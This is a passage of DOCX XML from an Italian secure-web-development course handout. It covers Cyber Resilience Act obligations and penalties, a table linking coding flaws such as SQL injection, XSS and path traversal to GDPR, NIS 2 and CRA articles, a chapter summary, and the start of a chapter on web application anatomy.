        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che lo costituiscono, comprese le dipendenze open source, con versioni e licenze. È l’equivalente dell’etichetta degli ingredienti su una confezione alimentare. Esistono strumenti che la generano automaticamente:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cyclonedx-python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per Python,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">syft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per progetti misti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability handling.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Obbligo di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gestire e divulgare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">le vulnerabilità scoperte nel prodotto durante tutta la sua vita commerciale: ricevere segnalazioni, assegnare CVE, pubblicare advisory, rilasciare patch. Significa che l’azienda deve mantenere un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">security.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sul proprio sito, un canale di contatto, un processo interno di gestione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Aggiornamenti di sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gratuiti per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">almeno 5 anni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dalla vendita (o per la vita prevista del prodotto, se inferiore). Questo è un colpo durissimo per chi vendeva dispositivi IoT senza alcun supporto a lungo termine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Notifica delle vulnerabilità sfruttate attivamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">entro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">24 ore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">all’ENISA (l’Agenzia europea per la cybersicurezza), con report di follow-up entro 72 ore.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:id="101" w:name="sanzioni-cra"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanzioni CRA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fino a 15 milioni di euro o 2,5% del fatturato annuo globale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il maggiore dei due) per violazioni dei requisiti essenziali di sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fino a 10 milioni o 2%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per altre violazioni (es. SBOM mancante, mancata cooperazione con le autorità)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anche qui, il segnale politico è chiaro: vendere software insicuro nel mercato europeo, dal 2027, ha un costo definito per legge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkStart w:id="103" w:name="X78e02aa041eccfe02994ed387be5eb5388021ef"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="465" w:name="sec_2_5"/>
      <w:r>
        <w:t xml:space="preserve">2.5 Tabella riassuntiva — errore di codice e norma violata</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa tabella collega errori tecnici concreti che vedrai nei capitoli successivi alle norme che potrebbero essere violate quando l’errore causa un incidente. È pensata come riferimento rapido.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 di codice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capitolo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Norma potenzialmente violata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concatenare input utente in una query SQL (SQL Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_5" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 5</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GDPR art. 32 (sicurezza); NIS 2 art. 21 (sicurezza dello sviluppo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Non verificare che l’utente sia il proprietario della risorsa (IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_6" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 6</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GDPR art. 5 (riservatezza); GDPR art. 32; NIS 2 art. 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Salvare le password in chiaro o con MD5/SHA-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 7</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GDPR art. 32 (cifratura, integrità)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Non cifrare i dati sensibili nel database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 7</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GDPR art. 32 (pseudonimizzazione e cifratura)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stampare l’input utente in HTML senza escape (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GDPR art. 32; NIS 2 art. 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usare librerie con CVE noti senza aggiornarle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 9</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NIS 2 art. 21 (supply chain); CRA (vulnerability handling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Permettere</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">../</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">nei parametri di download (Path Traversal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_10" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 10</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GDPR art. 32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Assenza totale di log degli accessi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">trasversale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GDPR artt. 33-34 (impossibilità di notifica); NIS 2 art. 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backup non testati o assenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">trasversale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NIS 2 art. 21 (continuità operativa)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Distribuire un prodotto senza SBOM (dal 2027)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 9</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CRA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando in un capitolo successivo ti chiederai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">perché devo applicare questa correzione, è davvero importante?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, torna a questa tabella. La risposta non è solo tecnica: è giuridica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:id="104" w:name="riepilogo-del-capitolo-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="sec_2_6"/>
      <w:r>
        <w:t xml:space="preserve">2.6 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in vigore dal 2018) regola il trattamento dei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dati personali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di residenti UE. L’articolo 32 impone misure tecniche di sicurezza specifiche: cifratura, integrità, riservatezza, capacità di ripristino. Sanzioni fino a 20 milioni di euro o 4% del fatturato globale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NIS 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(recepita in Italia nel 2024) regola la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sicurezza dei sistemi informativi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delle organizzazioni in settori critici e importanti. L’articolo 21 elenca dieci misure tecniche obbligatorie. Sanzioni fino a 10 milioni o 2% del fatturato; possibile interdizione dei dirigenti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Resilience Act</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(obblighi principali dal 2027) regola la sicurezza dei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">prodotti con elementi digitali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">venduti nell’UE. Impone secure by design, SBOM, vulnerability handling, aggiornamenti per almeno 5 anni. Sanzioni fino a 15 milioni o 2,5% del fatturato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le scelte tecniche che impari in questo corso non sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">buone pratiche consigliate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ma in molti casi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">requisiti normativi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La sicurezza del software è oggi un obbligo di legge, non una scelta professionale individuale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Non lo sapevo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non è una difesa: per il professionista è una colpa aggravante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Anatomia di un’applicazione web.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Prima di iniziare ad attaccare e difendere, mettiamo a fuoco i pezzi del meccanismo: cliente, server, HTTP, sessioni, database. È il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ponte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fra i corsi paralleli (programmazione, basi di dati, reti) e i capitoli tecnici di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkStart w:id="146" w:name="Xd499e77e631c073eb137e68bacc15d9aec1324d"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="ch_3"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 3 — Anatomia di un’applicazione web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (ambiente installato e funzionante), il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (mentalità avversaria).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2-3 ore se segui anche le esercitazioni pratiche. È il capitolo più lungo della dispensa, ma dopo averlo letto avrai un modello mentale solido di cosa succede ogni volta che digiti un indirizzo nel browser. Senza questo modello mentale, i capitoli successivi saranno parole nel vuoto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo capitolo non parla ancora di sicurezza. Parla di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">come è fatta</w:t>
      </w:r>
      <w:r>
